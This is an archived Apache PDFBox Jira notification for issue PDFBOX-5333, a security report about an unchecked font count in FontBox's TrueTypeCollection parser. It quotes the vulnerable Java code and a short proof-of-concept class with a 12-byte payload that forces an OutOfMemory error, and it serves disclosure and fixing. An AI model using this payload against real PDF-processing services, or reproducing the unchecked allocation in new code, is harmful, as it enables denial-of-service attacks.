You are viewing a plain text version of this content. The canonical link for it is here.
Posted to dev@pdfbox.apache.org by "Andreas Lehmkühler (Jira)" <ji...@apache.org> on 2021/11/26 07:43:00 UTC
[jira] [Updated] (PDFBOX-5333) Wrong number of fonts leads to OOM-Exception
[ https://issues.apache.org/jira/browse/PDFBOX-5333?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
Andreas Lehmkühler updated PDFBOX-5333:
---------------------------------------
Description:
We got the following error report from Pinohans@JDArmy through security@
+Description:+
In FontBox of Apache PDFBox, a carefully crafted PDF
file can trigger an OutOfMemory-Exception while loading the file. This
issue affects Apache PDFBox version 1.8 to 3.0.0-alpha2.
Product: Apache PDFBox
Version: 1.8-3.0.0-alpha2
Affected component:
src/main/java/org/apache/fontbox/ttf/TrueTypeCollection.java
+Vulnerability:+
{code}
67 TrueTypeCollection(TTFDataStream stream) throws IOException
68 {
69 this.stream = stream;
70
71 // TTC header
72 String tag = stream.readTag();
73 if (!tag.equals("ttcf"))
74 {
75 throw new IOException("Missing TTC header");
76 }
77 float version = stream.read32Fixed();
78 numFonts = (int)stream.readUnsignedInt(); # Vulnerability
79 fontOffsets = new long[numFonts]; #
Vulnerability
80 for (int i = 0; i < numFonts; i++)
81 {
82 fontOffsets[i] = stream.readUnsignedInt();
83 }
{code}
+Attack vector:+
{code}
import org.apache.fontbox.ttf.TrueTypeCollection;
import java.io.*;
public class main {
public static void main(String[] args) throws IOException {
byte[] payload = {0x74, 0x74, 0x63, 0x66, 0x00, 0x00, 0x00, 0x00, 0x7F, (byte) 0xFF, (byte) 0xFF, (byte) 0xFF};
TrueTypeCollection ttc = new TrueTypeCollection(new ByteArrayInputStream(payload));
}
}
{code}
was:
We got the following error report from Pinohans@JDArmy through security@
+Description:+
In FontBox of Apache PDFBox, a carefully crafted PDF
file can trigger an OutOfMemory-Exception while loading the file. This
issue affects Apache PDFBox version 1.8 to 3.0.0-alpha2.
Product: Apache PDFBox
Version: 1.8-3.0.0-alpha2
Affected component:
src/main/java/org/apache/fontbox/ttf/TrueTypeCollection.java
+Vulnerability:+
{code}
67 TrueTypeCollection(TTFDataStream stream) throws IOException
68 {
69 this.stream = stream;
70
71 // TTC header
72 String tag = stream.readTag();
73 if (!tag.equals("ttcf"))
74 {
75 throw new IOException("Missing TTC header");
76 }
77 float version = stream.read32Fixed();
78 numFonts = (int)stream.readUnsignedInt(); # Vulnerability
79 fontOffsets = new long[numFonts]; #
Vulnerability
80 for (int i = 0; i < numFonts; i++)
81 {
82 fontOffsets[i] = stream.readUnsignedInt();
83 }
{code}
+Attack vector:+
{code}
import org.apache.fontbox.ttf.TrueTypeCollection;
import java.io.*;
public class main {
public static void main(String[] args) throws IOException {
byte[] payload = {0x74, 0x74, 0x63, 0x66, 0x00, 0x00, 0x00, 0x00,
0x7F, (byte) 0xFF, (byte) 0xFF, (byte) 0xFF};
TrueTypeCollection ttc = new TrueTypeCollection(new
ByteArrayInputStream(payload));
}
}
{code}
> Wrong number of fonts leads to OOM-Exception
> --------------------------------------------
>
> Key: PDFBOX-5333
> URL: https://issues.apache.org/jira/browse/PDFBOX-5333
> Project: PDFBox
> Issue Type: Bug
> Components: FontBox
> Affects Versions: 2.0.24, 3.0.0 PDFBox
> Reporter: Andreas Lehmkühler
> Assignee: Andreas Lehmkühler
> Priority: Major
> Fix For: 2.0.25, 3.0.0 PDFBox
>
>
> We got the following error report from Pinohans@JDArmy through security@
> +Description:+
> In FontBox of Apache PDFBox, a carefully crafted PDF
> file can trigger an OutOfMemory-Exception while loading the file. This
> issue affects Apache PDFBox version 1.8 to 3.0.0-alpha2.
> Product: Apache PDFBox
> Version: 1.8-3.0.0-alpha2
> Affected component:
> src/main/java/org/apache/fontbox/ttf/TrueTypeCollection.java
> +Vulnerability:+
> {code}
> 67 TrueTypeCollection(TTFDataStream stream) throws IOException
> 68 {
> 69 this.stream = stream;
> 70
> 71 // TTC header
> 72 String tag = stream.readTag();
> 73 if (!tag.equals("ttcf"))
> 74 {
> 75 throw new IOException("Missing TTC header");
> 76 }
> 77 float version = stream.read32Fixed();
> 78 numFonts = (int)stream.readUnsignedInt(); # Vulnerability
> 79 fontOffsets = new long[numFonts]; #
> Vulnerability
> 80 for (int i = 0; i < numFonts; i++)
> 81 {
> 82 fontOffsets[i] = stream.readUnsignedInt();
> 83 }
> {code}
> +Attack vector:+
> {code}
> import org.apache.fontbox.ttf.TrueTypeCollection;
> import java.io.*;
> public class main {
> public static void main(String[] args) throws IOException {
> byte[] payload = {0x74, 0x74, 0x63, 0x66, 0x00, 0x00, 0x00, 0x00, 0x7F, (byte) 0xFF, (byte) 0xFF, (byte) 0xFF};
> TrueTypeCollection ttc = new TrueTypeCollection(new ByteArrayInputStream(payload));
> }
> }
> {code}
--
This message was sent by Atlassian Jira
(v8.20.1#820001)
---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscribe@pdfbox.apache.org
For additional commands, e-mail: dev-help@pdfbox.apache.org